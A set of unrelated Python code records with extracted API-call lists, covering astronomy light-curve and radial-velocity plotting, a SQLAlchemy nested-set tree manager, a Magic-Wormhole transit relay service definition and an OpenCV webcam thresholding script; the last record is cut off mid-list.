pl.ylabel(r"$V_{\rm{bis}}$ (m/s)")
ymin = np.nanmin(y3) * fac2
ymax = np.nanmax(y3) * fac2
yr = ymax - ymin
pl.ylim(ymin - 0.1 * yr, ymax + 0.1 * yr)
pl.xlabel(xttl)
pl.xlim(xr[0], xr[1])
if savefile: pl.savefig(savefile)
return
def plotPer(time, y1, y2, y3 = None, figno = 2, \
savefile = None, period = None, fmp = 8):
'''Plot light curve and RV amplitude spectra'''
M, N = np.shape(y1)
pmax = 2* (np.nanmax(time) - np.nanmin(time))
if period is None:
dt = np.median(time[1:]-time[:N-1])
pmin = dt * 2.
else:
pmin = period / fmp
nper = 1000
if period is None:
fac = 1.0
else:
fac = period
if y3 is None:
ny = 2
else:
ny = 3
y = np.zeros((M*ny, N))
y[:M,:] = y1
y[M:2*M,:] = y2
if not (y3 is None):
y[2*M:,:] = y3
res = sinefitm(time, y, fmin = 1./pmax, fmax = 1./pmin, \
nfreq = nper)
freq, amps, ampc = res[0], res[2], res[3]
pers = 1.0 / freq
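    # Combine the sine and cosine fit coefficients in quadrature to get the amplitude at each frequency.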
amp = np.sqrt(amps**2 + ampc**2)
amp1 = amp[:M,:]
amp2 = amp[M:2*M,:]
if not (y3 is None):
amp3 = amp[2*M:,:]
ee = dofig(figno, 1, ny, aspect = 1)
ax1 = doaxes(ee, 1, ny, 0, 0)
pl.setp(ax1.get_xticklabels(), visible = False)
pl.ylabel(r"$A_F$ (\%)")
for i in np.arange(M):
pl.plot(fac / pers, amp1[i,:] * fac1, ls[i], c = col[i])
pl.ylim(0, 1.1 * np.nanmax(amp1) * fac1)
ax2 = doaxes(ee, 1, ny, 0, 1, sharex = ax1)
pl.ylabel(r"$A_V$ (m/s)")
for i in np.arange(M):
pl.plot(fac / pers, amp2[i,:] * fac2, ls[i], c = col[i])
pl.ylim(0, 1.1 * np.nanmax(amp2) * fac2)
if not(y3 is None):
ax3 = doaxes(ee, 1, ny, 0, 2, sharex = ax1)
pl.ylabel(r"$A_{\mathrm{bis}}$ (m/s)")
for i in np.arange(M):
pl.plot(fac / pers, amp3[i,:] * fac3, ls[i], c = col[i])
pl.ylim(0, 1.1 * np.nanmax(amp3) * fac3)
if period is None:
pl.xlabel(r"Frequency (cycles/day)")
else:
pl.xlabel(r"Frequency (cycles/$P_{\mathrm{rot}}^{-1}$)")
if savefile:
pl.savefig(savefile)
return
def plotTSPer(time, y1, y2, y3 = None, figno = [1,2], savefile = [None, None], \
discrete = False, period = None, xper = False, \
fmp = 8):
'''Plot both time series and amplitude spectra for light and RV'''
plotTS(time, y1, y2, y3 = y3, figno = figno[0], discrete = discrete, \
savefile = savefile[0], period = period, xper = xper)
plotPer(time, y1, y2, y3 = y3, figno = figno[1], savefile = savefile[1], \
period = period, fmp = fmp)
return
|
[
"gls.sinefitm",
"numpy.copy",
"numpy.median",
"pylab.ylabel",
"numpy.zeros",
"multiplot.doaxes",
"pylab.plot",
"numpy.nanmin",
"numpy.shape",
"pylab.savefig",
"numpy.arange",
"pylab.ylim",
"pylab.xlabel",
"pylab.xlim",
"multiplot.dofig",
"numpy.nanmax",
"numpy.sqrt"
] |
[((382, 394), 'numpy.shape', 'np.shape', (['y1'], {}), '(y1)\n', (390, 394), True, 'import numpy as np\n'), ((779, 808), 'multiplot.dofig', 'dofig', (['figno', '(1)', 'ny'], {'aspect': '(1)'}), '(figno, 1, ny, aspect=1)\n', (784, 808), False, 'from multiplot import dofig, doaxes\n'), ((821, 844), 'multiplot.doaxes', 'doaxes', (['ee', '(1)', 'ny', '(0)', '(0)'], {}), '(ee, 1, ny, 0, 0)\n', (827, 844), False, 'from multiplot import dofig, doaxes\n'), ((858, 870), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (867, 870), True, 'import numpy as np\n'), ((931, 961), 'pylab.ylabel', 'pl.ylabel', (['"""$\\\\Delta F$ (\\\\%)"""'], {}), "('$\\\\Delta F$ (\\\\%)')\n", (940, 961), True, 'import pylab as pl\n'), ((1050, 1091), 'pylab.ylim', 'pl.ylim', (['(ymin - 0.1 * yr)', '(ymax + 0.1 * yr)'], {}), '(ymin - 0.1 * yr, ymax + 0.1 * yr)\n', (1057, 1091), True, 'import pylab as pl\n'), ((1102, 1137), 'multiplot.doaxes', 'doaxes', (['ee', '(1)', 'ny', '(0)', '(1)'], {'sharex': 'ax1'}), '(ee, 1, ny, 0, 1, sharex=ax1)\n', (1108, 1137), False, 'from multiplot import dofig, doaxes\n'), ((1153, 1165), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (1162, 1165), True, 'import numpy as np\n'), ((1226, 1256), 'pylab.ylabel', 'pl.ylabel', (['"""$\\\\Delta V$ (m/s)"""'], {}), "('$\\\\Delta V$ (m/s)')\n", (1235, 1256), True, 'import pylab as pl\n'), ((1346, 1387), 'pylab.ylim', 'pl.ylim', (['(ymin - 0.1 * yr)', '(ymax + 0.1 * yr)'], {}), '(ymin - 0.1 * yr, ymax + 0.1 * yr)\n', (1353, 1387), True, 'import pylab as pl\n'), ((1748, 1763), 'pylab.xlabel', 'pl.xlabel', (['xttl'], {}), '(xttl)\n', (1757, 1763), True, 'import pylab as pl\n'), ((1768, 1789), 'pylab.xlim', 'pl.xlim', (['xr[0]', 'xr[1]'], {}), '(xr[0], xr[1])\n', (1775, 1789), True, 'import pylab as pl\n'), ((2007, 2019), 'numpy.shape', 'np.shape', (['y1'], {}), '(y1)\n', (2015, 2019), True, 'import numpy as np\n'), ((2353, 2374), 'numpy.zeros', 'np.zeros', (['(M * ny, N)'], {}), '((M * ny, N))\n', (2361, 2374), True, 'import numpy as np\n'), ((2468, 2531), 'gls.sinefitm', 'sinefitm', (['time', 'y'], {'fmin': '(1.0 / pmax)', 'fmax': '(1.0 / pmin)', 'nfreq': 'nper'}), '(time, y, fmin=1.0 / pmax, fmax=1.0 / pmin, nfreq=nper)\n', (2476, 2531), False, 'from gls import sinefitm\n'), ((2631, 2661), 'numpy.sqrt', 'np.sqrt', (['(amps ** 2 + ampc ** 2)'], {}), '(amps ** 2 + ampc ** 2)\n', (2638, 2661), True, 'import numpy as np\n'), ((2769, 2798), 'multiplot.dofig', 'dofig', (['figno', '(1)', 'ny'], {'aspect': '(1)'}), '(figno, 1, ny, aspect=1)\n', (2774, 2798), False, 'from multiplot import dofig, doaxes\n'), ((2811, 2834), 'multiplot.doaxes', 'doaxes', (['ee', '(1)', 'ny', '(0)', '(0)'], {}), '(ee, 1, ny, 0, 0)\n', (2817, 2834), False, 'from multiplot import dofig, doaxes\n'), ((2891, 2915), 'pylab.ylabel', 'pl.ylabel', (['"""$A_F$ (\\\\%)"""'], {}), "('$A_F$ (\\\\%)')\n", (2900, 2915), True, 'import pylab as pl\n'), ((2929, 2941), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (2938, 2941), True, 'import numpy as np\n'), ((3067, 3102), 'multiplot.doaxes', 'doaxes', (['ee', '(1)', 'ny', '(0)', '(1)'], {'sharex': 'ax1'}), '(ee, 1, ny, 0, 1, sharex=ax1)\n', (3073, 3102), False, 'from multiplot import dofig, doaxes\n'), ((3109, 3133), 'pylab.ylabel', 'pl.ylabel', (['"""$A_V$ (m/s)"""'], {}), "('$A_V$ (m/s)')\n", (3118, 3133), True, 'import pylab as pl\n'), ((3148, 3160), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (3157, 3160), True, 'import numpy as np\n'), ((433, 445), 'numpy.copy', 'np.copy', (['mrk'], {}), '(mrk)\n', (440, 445), True, 'import numpy as np\n'), ((469, 480), 'numpy.copy', 'np.copy', (['ls'], {}), '(ls)\n', (476, 480), True, 'import numpy as np\n'), ((880, 925), 'pylab.plot', 'pl.plot', (['tt', '(y1[i, :] * fac1)', 'm1[i]'], {'c': 'col[i]'}), '(tt, y1[i, :] * fac1, m1[i], c=col[i])\n', (887, 925), True, 'import pylab as pl\n'), ((972, 985), 'numpy.nanmin', 'np.nanmin', (['y1'], {}), '(y1)\n', (981, 985), True, 'import numpy as np\n'), ((1004, 1017), 'numpy.nanmax', 'np.nanmax', (['y1'], {}), '(y1)\n', (1013, 1017), True, 'import numpy as np\n'), ((1175, 1220), 'pylab.plot', 'pl.plot', (['tt', '(y2[i, :] * fac2)', 'm1[i]'], {'c': 'col[i]'}), '(tt, y2[i, :] * fac2, m1[i], c=col[i])\n', (1182, 1220), True, 'import pylab as pl\n'), ((1268, 1281), 'numpy.nanmin', 'np.nanmin', (['y2'], {}), '(y2)\n', (1277, 1281), True, 'import numpy as np\n'), ((1300, 1313), 'numpy.nanmax', 'np.nanmax', (['y2'], {}), '(y2)\n', (1309, 1313), True, 'import numpy as np\n'), ((1426, 1461), 'multiplot.doaxes', 'doaxes', (['ee', '(1)', 'ny', '(0)', '(2)'], {'sharex': 'ax1'}), '(ee, 1, ny, 0, 2, sharex=ax1)\n', (1432, 1461), False, 'from multiplot import dofig, doaxes\n'), ((1481, 1493), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (1490, 1493), True, 'import numpy as np\n'), ((1562, 1596), 'pylab.ylabel', 'pl.ylabel', (['"""$V_{\\\\rm{bis}}$ (m/s)"""'], {}), "('$V_{\\\\rm{bis}}$ (m/s)')\n", (1571, 1596), True, 'import pylab as pl\n'), ((1702, 1743), 'pylab.ylim', 'pl.ylim', (['(ymin - 0.1 * yr)', '(ymax + 0.1 * yr)'], {}), '(ymin - 0.1 * yr, ymax + 0.1 * yr)\n', (1709, 1743), True, 'import pylab as pl\n'), ((1807, 1827), 'pylab.savefig', 'pl.savefig', (['savefile'], {}), '(savefile)\n', (1817, 1827), True, 'import pylab as pl\n'), ((2106, 2140), 'numpy.median', 'np.median', (['(time[1:] - time[:N - 1])'], {}), '(time[1:] - time[:N - 1])\n', (2115, 2140), True, 'import numpy as np\n'), ((2951, 3006), 'pylab.plot', 'pl.plot', (['(fac / pers)', '(amp1[i, :] * fac1)', 'ls[i]'], {'c': 'col[i]'}), '(fac / pers, amp1[i, :] * fac1, ls[i], c=col[i])\n', (2958, 3006), True, 'import pylab as pl\n'), ((3170, 3225), 'pylab.plot', 'pl.plot', (['(fac / pers)', '(amp2[i, :] * fac2)', 'ls[i]'], {'c': 'col[i]'}), '(fac / pers, amp2[i, :] * fac2, ls[i], c=col[i])\n', (3177, 3225), True, 'import pylab as pl\n'), ((3314, 3349), 'multiplot.doaxes', 'doaxes', (['ee', '(1)', 'ny', '(0)', '(2)'], {'sharex': 'ax1'}), '(ee, 1, ny, 0, 2, sharex=ax1)\n', (3320, 3349), False, 'from multiplot import dofig, doaxes\n'), ((3360, 3398), 'pylab.ylabel', 'pl.ylabel', (['"""$A_{\\\\mathrm{bis}}$ (m/s)"""'], {}), "('$A_{\\\\mathrm{bis}}$ (m/s)')\n", (3369, 3398), True, 'import pylab as pl\n'), ((3416, 3428), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (3425, 3428), True, 'import numpy as np\n'), ((3583, 3618), 'pylab.xlabel', 'pl.xlabel', (['"""Frequency (cycles/day)"""'], {}), "('Frequency (cycles/day)')\n", (3592, 3618), True, 'import pylab as pl\n'), ((3638, 3694), 'pylab.xlabel', 'pl.xlabel', (['"""Frequency (cycles/$P_{\\\\mathrm{rot}}^{-1}$)"""'], {}), "('Frequency (cycles/$P_{\\\\mathrm{rot}}^{-1}$)')\n", (3647, 3694), True, 'import pylab as pl\n'), ((3720, 3740), 'pylab.savefig', 'pl.savefig', (['savefile'], {}), '(savefile)\n', (3730, 3740), True, 'import pylab as pl\n'), ((649, 664), 'numpy.nanmin', 'np.nanmin', (['time'], {}), '(time)\n', (658, 664), True, 'import numpy as np\n'), ((666, 681), 'numpy.nanmax', 'np.nanmax', (['time'], {}), '(time)\n', (675, 681), True, 'import numpy as np\n'), ((1507, 1552), 'pylab.plot', 'pl.plot', (['tt', '(y3[i, :] * fac2)', 'm1[i]'], {'c': 'col[i]'}), '(tt, y3[i, :] * fac2, m1[i], c=col[i])\n', (1514, 1552), True, 'import pylab as pl\n'), ((1612, 1625), 'numpy.nanmin', 'np.nanmin', (['y3'], {}), '(y3)\n', (1621, 1625), True, 'import numpy as np\n'), ((1648, 1661), 'numpy.nanmax', 'np.nanmax', (['y3'], {}), '(y3)\n', (1657, 1661), True, 'import numpy as np\n'), ((2035, 2050), 'numpy.nanmax', 'np.nanmax', (['time'], {}), '(time)\n', (2044, 2050), True, 'import numpy as np\n'), ((2053, 2068), 'numpy.nanmin', 'np.nanmin', (['time'], {}), '(time)\n', (2062, 2068), True, 'import numpy as np\n'), ((3442, 3497), 'pylab.plot', 'pl.plot', (['(fac / pers)', '(amp3[i, :] * fac3)', 'ls[i]'], {'c': 'col[i]'}), '(fac / pers, amp3[i, :] * fac3, ls[i], c=col[i])\n', (3449, 3497), True, 'import pylab as pl\n'), ((3029, 3044), 'numpy.nanmax', 'np.nanmax', (['amp1'], {}), '(amp1)\n', (3038, 3044), True, 'import numpy as np\n'), ((3248, 3263), 'numpy.nanmax', 'np.nanmax', (['amp2'], {}), '(amp2)\n', (3257, 3263), True, 'import numpy as np\n'), ((3524, 3539), 'numpy.nanmax', 'np.nanmax', (['amp3'], {}), '(amp3)\n', (3533, 3539), True, 'import numpy as np\n')]
|
from sqlalchemy import func
from sqlalchemy.exc import SQLAlchemyError
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import and_
import uuid
import json
from common.database import db
from common.ret_status import RetStatus
class TreeManager:
def __init__(self, model_obj=None, session=None):
self.__model = model_obj
self.__session = session
def get_root_node(self, node_uuid=None, many=False):
tmp_model = self.__model
ret = RetStatus(status=True)
if many:
try:
ret.data = tmp_model.query.filter(tmp_model.root_uuid == tmp_model.node_uuid, tmp_model.parent_uuid == "").all()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
else:
if node_uuid is None:
return RetStatus(False, "invalid node uuid.")
else:
try:
ret.data = tmp_model.query.filter(tmp_model.root_uuid == tmp_model.node_uuid, tmp_model.node_uuid == node_uuid).first()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
return ret
def add_node(self, node_uuid=None, node=None):
tmp_session = self.__session
tmp_model = self.__model
if node is None:
return RetStatus(False, "invalid insert node.")
"""add node as root"""
if node_uuid is None:
node.node_uuid = uuid.uuid1()
node.root_uuid = node.node_uuid
node.parent_uuid = ""
node.left = 0
node.right = 1
try:
tmp_session.add(node)
tmp_session.commit()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
else:
try:
target_node = tmp_model.query.filter(tmp_model.node_uuid==node_uuid).first()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
if target_node is None:
return RetStatus(False, "invalid node uuid.")
else:
"""add node as the last children"""
node.node_uuid = uuid.uuid1()
node.root_uuid = target_node.root_uuid
node.parent_uuid = target_node.node_uuid
node.left = target_node.right
node.right = target_node.right + 1
try:
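                    # Nested-set insert: shift left/right values to open a two-wide gap at the parent's old right boundary, then place the new leaf inside it.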
tmp_model.query.filter(tmp_model.left>target_node.right).update({tmp_model.left:tmp_model.left+2})
tmp_model.query.filter(tmp_model.right>=target_node.right).update({tmp_model.right:tmp_model.right+2})
tmp_session.add(node)
tmp_session.commit()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
return RetStatus(True)
"""check node uuid exist"""
def check(self, node_uuid=None):
tmp_model = self.__model
node = None
if node_uuid is None:
return RetStatus(False, "invalid node uuid.")
try:
node = tmp_model.query.filter(tmp_model.node_uuid == node_uuid).first()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
if node is None:
return RetStatus(False, "nothing be searched.")
return RetStatus(True)
"""delete node and children"""
def delete_node(self, node_uuid=None, node=None ):
tmp_session = self.__session
tmp_model = self.__model
if node:
try:
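                # Nested-set delete: drop the whole subtree, then shrink later left/right values by the subtree's width.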
tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.left>=node.left,tmp_model.right<=node.right).delete()
tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.left>node.right).update({tmp_model.left:tmp_model.left-(node.right-node.left)-1})
tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.right>node.right).update({tmp_model.right:tmp_model.right-(node.right-node.left)-1})
tmp_session.commit()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
return RetStatus(True)
if node_uuid is None:
return RetStatus(False, "invalid node uuid.")
else:
try:
node = tmp_model.query.filter(tmp_model.node_uuid==node_uuid).one()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
if node is None:
return RetStatus(False, "invalid node uuid.")
else:
try:
tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.left>=node.left,tmp_model.right<=node.right).delete()
tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.left>node.right).update({tmp_model.left:tmp_model.left-(node.right-node.left)-1})
tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.right>node.right).update({tmp_model.right:tmp_model.right-(node.right-node.left)-1})
tmp_session.commit()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
return RetStatus(True)
"""delete multiple nodes"""
def delete_nodes(self, node_uuids=None):
if not isinstance(node_uuids, list):
return RetStatus(False, "invalid node uuids list.")
else:
node_error = []
for uuid in node_uuids:
ret = self.delete_node(uuid)
if ret.check() is False:
node_error.append(uuid)
if node_error:
return RetStatus(False, "some node delete failed.", json.dumps(node_error))
return RetStatus(True)
"""find one node or many nodes"""
def find_node(self, node_uuid=None, many=False, parents=False):
tmp_model = self.__model
if node_uuid is None:
return RetStatus(False, "invalid node uuid.")
else:
try:
node = tmp_model.query.filter(tmp_model.node_uuid==node_uuid).first()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
if many:
nodes = None
if parents:
try:
nodes = tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.node_uuid==node.parent_uuid).all()
except SQLAlchemyError as e:
return RetStatus(False, "find parents nodes failed.")
return RetStatus(True, data=nodes)
else:
try:
nodes = tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.parent_uuid==node.node_uuid).all()
except SQLAlchemyError as e:
return RetStatus(False, "find children nodes failed.")
return RetStatus(True, data=nodes)
elif node is None:
return RetStatus(False, "nothing will be search.")
else:
return RetStatus(True, data=node)
"""update node"""
def update_node(self, node=None):
tmp_session = self.__session
if node is None:
return RetStatus(False, msg="invalid node.")
else:
try:
tmp_session.commit()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
return RetStatus(True)
class TreeMixin:
node_uuid = db.Column(db.String(36), primary_key=True)
root_uuid = db.Column(db.String(36))
parent_uuid = db.Column(db.String(36))
left = db.Column(db.Integer, default=0)
right = db.Column(db.Integer, default=0)
|
[
"json.dumps",
"common.database.db.String",
"uuid.uuid1",
"common.ret_status.RetStatus",
"common.database.db.Column"
] |
[((7910, 7942), 'common.database.db.Column', 'db.Column', (['db.Integer'], {'default': '(0)'}), '(db.Integer, default=0)\n', (7919, 7942), False, 'from common.database import db\n'), ((7965, 7997), 'common.database.db.Column', 'db.Column', (['db.Integer'], {'default': '(0)'}), '(db.Integer, default=0)\n', (7974, 7997), False, 'from common.database import db\n'), ((482, 504), 'common.ret_status.RetStatus', 'RetStatus', ([], {'status': '(True)'}), '(status=True)\n', (491, 504), False, 'from common.ret_status import RetStatus\n'), ((2929, 2944), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {}), '(True)\n', (2938, 2944), False, 'from common.ret_status import RetStatus\n'), ((3437, 3452), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {}), '(True)\n', (3446, 3452), False, 'from common.ret_status import RetStatus\n'), ((5377, 5392), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {}), '(True)\n', (5386, 5392), False, 'from common.ret_status import RetStatus\n'), ((5922, 5937), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {}), '(True)\n', (5931, 5937), False, 'from common.ret_status import RetStatus\n'), ((7761, 7774), 'common.database.db.String', 'db.String', (['(36)'], {}), '(36)\n', (7770, 7774), False, 'from common.database import db\n'), ((7826, 7839), 'common.database.db.String', 'db.String', (['(36)'], {}), '(36)\n', (7835, 7839), False, 'from common.database import db\n'), ((7873, 7886), 'common.database.db.String', 'db.String', (['(36)'], {}), '(36)\n', (7882, 7886), False, 'from common.database import db\n'), ((1336, 1376), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid insert node."""'], {}), "(False, 'invalid insert node.')\n", (1345, 1376), False, 'from common.ret_status import RetStatus\n'), ((1469, 1481), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (1479, 1481), False, 'import uuid\n'), ((3117, 3155), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuid."""'], {}), "(False, 'invalid node uuid.')\n", (3126, 3155), False, 'from common.ret_status import RetStatus\n'), ((3381, 3421), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""nothing be searched."""'], {}), "(False, 'nothing be searched.')\n", (3390, 3421), False, 'from common.ret_status import RetStatus\n'), ((4283, 4298), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {}), '(True)\n', (4292, 4298), False, 'from common.ret_status import RetStatus\n'), ((4348, 4386), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuid."""'], {}), "(False, 'invalid node uuid.')\n", (4357, 4386), False, 'from common.ret_status import RetStatus\n'), ((5535, 5579), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuids list."""'], {}), "(False, 'invalid node uuids list.')\n", (5544, 5579), False, 'from common.ret_status import RetStatus\n'), ((6129, 6167), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuid."""'], {}), "(False, 'invalid node uuid.')\n", (6138, 6167), False, 'from common.ret_status import RetStatus\n'), ((7478, 7515), 'common.ret_status.RetStatus', 'RetStatus', (['(False)'], {'msg': '"""invalid node."""'}), "(False, msg='invalid node.')\n", (7487, 7515), False, 'from common.ret_status import RetStatus\n'), ((7695, 7710), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {}), '(True)\n', (7704, 7710), False, 'from common.ret_status import RetStatus\n'), ((831, 869), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuid."""'], {}), "(False, 'invalid node uuid.')\n", (840, 869), False, 'from common.ret_status import RetStatus\n'), ((2087, 2125), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuid."""'], {}), "(False, 'invalid node uuid.')\n", (2096, 2125), False, 'from common.ret_status import RetStatus\n'), ((2231, 2243), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (2241, 2243), False, 'import uuid\n'), ((3309, 3336), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (3318, 3336), False, 'from common.ret_status import RetStatus\n'), ((4646, 4684), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""invalid node uuid."""'], {}), "(False, 'invalid node uuid.')\n", (4655, 4684), False, 'from common.ret_status import RetStatus\n'), ((732, 759), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (741, 759), False, 'from common.ret_status import RetStatus\n'), ((1784, 1811), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (1793, 1811), False, 'from common.ret_status import RetStatus\n'), ((2000, 2027), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (2009, 2027), False, 'from common.ret_status import RetStatus\n'), ((4236, 4263), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (4245, 4263), False, 'from common.ret_status import RetStatus\n'), ((4566, 4593), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (4575, 4593), False, 'from common.ret_status import RetStatus\n'), ((5883, 5905), 'json.dumps', 'json.dumps', (['node_error'], {}), '(node_error)\n', (5893, 5905), False, 'import json\n'), ((6349, 6376), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (6358, 6376), False, 'from common.ret_status import RetStatus\n'), ((6773, 6800), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {'data': 'nodes'}), '(True, data=nodes)\n', (6782, 6800), False, 'from common.ret_status import RetStatus\n'), ((7142, 7169), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {'data': 'nodes'}), '(True, data=nodes)\n', (7151, 7169), False, 'from common.ret_status import RetStatus\n'), ((7224, 7267), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""nothing will be search."""'], {}), "(False, 'nothing will be search.')\n", (7233, 7267), False, 'from common.ret_status import RetStatus\n'), ((7309, 7335), 'common.ret_status.RetStatus', 'RetStatus', (['(True)'], {'data': 'node'}), '(True, data=node)\n', (7318, 7335), False, 'from common.ret_status import RetStatus\n'), ((7648, 7675), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (7657, 7675), False, 'from common.ret_status import RetStatus\n'), ((1121, 1148), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (1130, 1148), False, 'from common.ret_status import RetStatus\n'), ((2886, 2913), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (2895, 2913), False, 'from common.ret_status import RetStatus\n'), ((5334, 5361), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', 'e.message'], {}), '(False, e.message)\n', (5343, 5361), False, 'from common.ret_status import RetStatus\n'), ((6699, 6745), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""find parents nodes failed."""'], {}), "(False, 'find parents nodes failed.')\n", (6708, 6745), False, 'from common.ret_status import RetStatus\n'), ((7067, 7114), 'common.ret_status.RetStatus', 'RetStatus', (['(False)', '"""find children nodes failed."""'], {}), "(False, 'find children nodes failed.')\n", (7076, 7114), False, 'from common.ret_status import RetStatus\n')]
|
from twisted.application.service import ServiceMaker
TransitRelay = ServiceMaker(
"Magic-Wormhole Transit Relay", # name
"wormhole_transit_relay.server_tap", # module
"Provide the Transit Relay server for Magic-Wormhole clients.", # desc
"transitrelay", # tapname
)
|
[
"twisted.application.service.ServiceMaker"
] |
[((69, 242), 'twisted.application.service.ServiceMaker', 'ServiceMaker', (['"""Magic-Wormhole Transit Relay"""', '"""wormhole_transit_relay.server_tap"""', '"""Provide the Transit Relay server for Magic-Wormhole clients."""', '"""transitrelay"""'], {}), "('Magic-Wormhole Transit Relay',\n 'wormhole_transit_relay.server_tap',\n 'Provide the Transit Relay server for Magic-Wormhole clients.',\n 'transitrelay')\n", (81, 242), False, 'from twisted.application.service import ServiceMaker\n')]
|
import numpy as np
import imutils
import time
import cv2
video = cv2.VideoCapture(0)
video.set(cv2.CAP_PROP_BUFFERSIZE, 2)
while True:
ret, frame = video.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
all_chans = []
for chan in frame[:, :]:
_, binary = cv2.threshold(chan, 70, 255, cv2.THRESH_BINARY)
# binary = cv2.adaptiveThreshold(chan, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 151, 1.9)
all_chans.append(binary)
all_chans = np.array(all_chans)
"Mean color value and post conversion, not in mean!"
chan_mean = all_chans.mean(axis=2).astype("uint8")
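    # 3x3 structuring element for the dilation/erosion below; the normalization is harmless since only non-zero entries matter to cv2 morphology.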
kernel = np.ones((3, 3))
kernel = kernel / kernel.sum()
dil = cv2.dilate(chan_mean, kernel=kernel, iterations=1)
ero = cv2.erode(chan_mean, kernel=kernel, iterations=2)
# cv2.imshow("Frame", frame)
# cv2.imshow("all_chans", all_chans)
cv2.imshow("chan_mean", chan_mean)
# cv2.imshow("dil", dil)
# cv2.imshow("ero", ero)
key = cv2.waitKey(100)
if key == ord("q"):
break
elif key == 32:
cv2.imwrite("capture.png", frame)
print("Frame captured")
elif key > 0:
print("Pressed:", key)
|
[
"cv2.dilate",
"cv2.cvtColor",
"cv2.waitKey",
"cv2.threshold",
"cv2.imwrite",
"numpy.ones",
"cv2.VideoCapture",
"numpy.array",
"cv2.erode",
"cv2.imshow"
] |
[((66, 85), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (82, 85), False, 'import cv2\n'), ((178, 217), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2GRAY'], {}), '(frame, cv2.COLOR_BGR2GRAY)\n', (190, 217), False, 'import cv2\n'), ((498, 517), 'numpy.array', 'np.array', (['all_chans'], {}), '(all_chans)\n', (506, 517), True, 'import numpy as np\n'), ((645, 660), 'numpy.ones', 'np.ones', (['(3, 3)'], {}), '((3, 3))\n', (652, 660), True, 'import numpy as np\n'), ((706, 756), 'cv2.dilate', 'cv2.dilate', (['chan_mean'], {'kernel': 'kernel', 'iterations': '(1)'}), '(chan_mean, kernel=kernel, iterations=1)\n', (716, 756), False, 'import cv2\n'), ((767, 816), 'cv2.erode', 'cv2.erode', (['chan_mean'], {'kernel': 'kernel', 'iterations': '(2)'}), '(chan_mean, kernel=kernel, iterations=2)\n', (776, 816), False, 'import cv2\n'), ((896, 930), 'cv2.imshow', 'cv2.imshow', (['"""chan_mean"""', 'chan_mean'], {}), "('chan_mean', chan_mean)\n", (906, 930), False, 'import cv2\n'), ((1000, 1016), 'cv2.waitKey', 'cv2.waitKey', (['(100)'], {}), '(100)\n', (1011, 1016), False, 'import cv2\n'), ((287, 334), 'cv2.threshold', 'cv2.threshold', (['chan', '(70)', '(255)', 'cv2.THRESH_BINARY'], {}), '(chan, 70, 255, cv2.THRESH_BINARY)\n', (300, 